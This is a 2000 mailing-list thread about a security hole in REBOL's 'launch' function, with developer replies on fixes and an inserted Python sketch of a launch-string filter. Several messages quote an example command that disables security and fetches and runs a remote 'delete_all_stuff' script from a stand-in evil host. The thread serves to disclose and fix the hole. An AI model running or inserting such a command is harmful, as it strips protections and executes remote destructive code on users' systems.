Mailing List Archive: 49091 messages

[ALLY] Launch security?

 [1/8] from: fsievert:uos at: 21-Aug-2000 10:43


Hi!

I think that launch is not a really good idea. What happens when I say

    launch {-s --do "do http://www.very-evil-site.com/delete_all_stuff.r"}

in my REB site. This would allow me to kick away all of the security, wouldn't it?

I didn't test it, cause Linux/Lib6/Xper Version is not able to "launch", yet. But with Windows this should work, I think.

Launch must copy security environment to the second process and should have arguments like "do". (Without the next, of course :) Command-line arguments are no good idea, because filenames are written platform specific here.

USAGE:
    LAUNCH value

DESCRIPTION:
    Launches a new REBOL interpreter process.
    LAUNCH is a native value.

ARGUMENTS:
    value -- The command-line arguments (Type: any-string)

Comments?

Frank

 [2/8] from: petr:krenzelok:trz:cz at: 21-Aug-2000 11:15


[fsievert--uos--de] wrote:
> Hi!
>
> I think that launch is not a really good idea. What happens, when I say
>
> launch {-s --do "do http://www.very-evil-site.com/delete_all_stuff.r"}
and what even using windowless "-w" session :-) -pekr-

 [3/8] from: brian:hawley:bigfoot at: 21-Aug-2000 11:46


Frank ([fsievert--uos--de]) wrote:
>I think that launch is not a really good idea. What happens, when I say
>
> launch {-s --do "do http://www.very-evil-site.com/delete_all_stuff.r"}
>
>in my REB site. This would allow me to kick away all of the security,
>wouldn't it?
Yes, it would. I wrote about this last Friday on the rebol list, message #304082: "A small security hole REBOL, and a huge one!". Take a look at that thread, it's interesting reading. In reply, Jeff at REBOL Tech wrote:
>Launch, at least in its present form, will not likely be in
>the regular distribution. It went out in the windows view
<<quoted lines omitted: 3>>
>a module prevented from affecting the surrounding execution
>environment.
Sounds like good news, doesn't it? Brian Hawley

 [4/8] from: jeff:rebol at: 16-Sep-2000 8:23


>>> Frank ([fsievert--uos--de]) wrote:
>>> I think that launch is
>>> not a really good idea. What happens, when I say
>>> launch {-s --do "do http://www.very-evil-site.com/delete_all_stuff.r"}

Launch is being changed to improve its security in two important ways:

1. Launch only works from the test panel -- so launched scripts can not launch others.

2. Launched scripts *should* always start with default security running, regardless of other monkey business that people do with the launch string.

That's the basic idea. We really want to be able to use launch so if you see cases where the above is not the case or you think you see other risks involved with launch please let us know!

The current behavior of launch isn't likely the final behavior, but we need something like launch in the meantime until we add multi-tasking. So let's patch the holes and make it useful.

-jeff

 [5/8] from: petr:krenzelok:trz:cz at: 16-Sep-2000 18:41


----- Original Message -----
From: <[jeff--rebol--com]>
To: <[ally--rebol--com]>
Sent: Saturday, September 16, 2000 5:23 PM
Subject: [ALLY] Launch security? Re:(3)

>
> >>> Frank ([fsievert--uos--de]) wrote:
> >>> I think that launch is
> >>> not a really good idea. What happens, when I say
> >>> launch {-s --do "do http://www.very-evil-site.com/delete_all_stuff.r"}
> Launch is being changed to improve its security in two
> important ways:
>
> 1. Launch only works from the test panel -- so launched
> scripts can not launch others.

Uh! What a limitation, just checked out. Are we forced to write useful scripts using panel???

> 2. Launched scripts *should* always start with default
> security running, regardless of other monkey business
<<quoted lines omitted: 7>>
> until we add multi-tasking. So let's patch the holes and
> make it useful.

1) Haha :-))) So, all hackers, save current /View versions for later usage, till "dangerous" behavior is not removed :-)

2) Tasking? 8-) /me always wonder what are RT folks cooking behind the door ....

-pekr-

 [6/8] from: allenk:powerup:au at: 17-Sep-2000 1:17


----- Original Message -----
From: <[brian--hawley--bigfoot--com]>
To: <[ally--rebol--com]>
Sent: Tuesday, August 22, 2000 2:46 AM
Subject: [ALLY] Launch security? Re:

> Frank ([fsievert--uos--de]) wrote:
> >I think that launch is not a really good idea. What happens, when I say
> >
> > launch {-s --do "do http://www.very-evil-site.com/delete_all_stuff.r"}
> >
> >in my REB site. This would allow me to kick away all of the security,
<<quoted lines omitted: 6>>
> >the regular distribution. It went out in the windows view
> >version by accident.

Not sure if anything has changed to make launch safer or not, but 'launch looks like it is meant to be part of \view now, or at least Carl is making use of it in the View Test Panel at the moment.

Cheers,

Allen K

 [7/8] from: allenk:powerup:au at: 17-Sep-2000 3:23


----- Original Message -----
From: <[jeff--rebol--com]>
To: <[ally--rebol--com]>
Sent: Sunday, September 17, 2000 1:23 AM
Subject: [ALLY] Launch security? Re:(3)

>
> >>> Frank ([fsievert--uos--de]) wrote:
> >>> I think that launch is
> >>> not a really good idea. What happens, when I say
> >>> launch {-s --do "do http://www.very-evil-site.com/delete_all_stuff.r"}
> Launch is being changed to improve its security in two
> important ways:
<<quoted lines omitted: 3>>
> security running, regardless of other monkey business
> that people do with the launch string.

Hi Jeff,

I think if the second item is implemented then we may not need the first. Being able to launch is good, if for no other reason than to keep sessions from global contamination. Apart from 'do, 'script and quiet, are any of the others needed for launch? Maybe 'no-window would be good for spawning a server, but I wonder what dangers allowing the launching of 'no-window scripts could hold?

> That's the basic idea. We really want to be able to use
> launch so if you see cases where the above is not the case
<<quoted lines omitted: 5>>
> make it useful.
> -jeff

Multi-tasking too, the future is looking bright.

Cheers,

Allen K

Apologies to the world for Human Nature singing our national anthem at the Olympics games. Those responsible have been sacked :-) Our new team of Llamas are doing a much better job.
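
Two proposals from this thread, Jeff's rule that a launched script starts with default security whatever the launch string says and Allen's suggestion to pass through only a few options, can be modelled as a filter on the launch string. This is an added example in Python, not REBOL's launcher and not code from any poster; the function name, the long option spellings and the handling of bundled short options are assumptions, and the launch strings are constructed samples.

```python
import shlex

# Options forwarded to the child (assumed spellings; the thread names
# 'do, 'script and quiet as the ones worth keeping).
VALUE_OPTIONS = {"--do", "--script"}
LONG_ALLOWED = {"--quiet"}
SHORT_ALLOWED = {"q"}


def sanitize_launch(launch_string):
    """Split a launch string into (args forwarded to the child, options dropped).

    Security options (-s, +s, --secure LEVEL) are never forwarded, so the
    child starts at its default security level. Anything not allowlisted,
    including -w (windowless), is dropped as well.
    """
    tokens = shlex.split(launch_string)
    args, dropped = [], []
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok in VALUE_OPTIONS:
            if i + 1 >= len(tokens):
                raise ValueError(f"{tok} needs a value")
            args += [tok, tokens[i + 1]]  # value is passed as one argument
            i += 2
            continue
        if tok == "--secure":
            dropped.append(tok)
            i += 2  # also skip the level that follows it
            continue
        if tok in LONG_ALLOWED:
            args.append(tok)
        elif tok.startswith("--"):
            dropped.append(tok)
        elif tok[:1] in ("+", "-"):
            # Assumed: short options may be bundled (-qws), so check each letter.
            keep = [tok[0] == "-" and c in SHORT_ALLOWED for c in tok[1:]]
            dropped += [tok[0] + c for c, k in zip(tok[1:], keep) if not k]
            if any(keep):
                args.append("-" + "".join(c for c, k in zip(tok[1:], keep) if k))
        else:
            args.append(tok)  # positional argument, e.g. a script name
        i += 1
    return args, dropped


if __name__ == "__main__":
    # Constructed launch strings; example.com stands in for a remote script.
    for s in ('-s --do "do http://example.com/script.r"', "-qws --secure none app.r"):
        print(s, "->", sanitize_launch(s))
```

The dropped list is worth logging on the parent side, since a launch string that asks for lowered security is a signal in its own right.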

 [8/8] from: carl:rebol at: 18-Sep-2000 17:44


From Jeff:
> Launch is being changed to improve its security in two
<<quoted lines omitted: 4>>
> security running, regardless of other monkey business
> that people do with the launch string.

1 & 2 ARE implemented in the current release... but, sounds like they need more testing.

-Carl

Notes
  • Quoted lines have been omitted from some messages.
    View the message alone to see the lines that have been omitted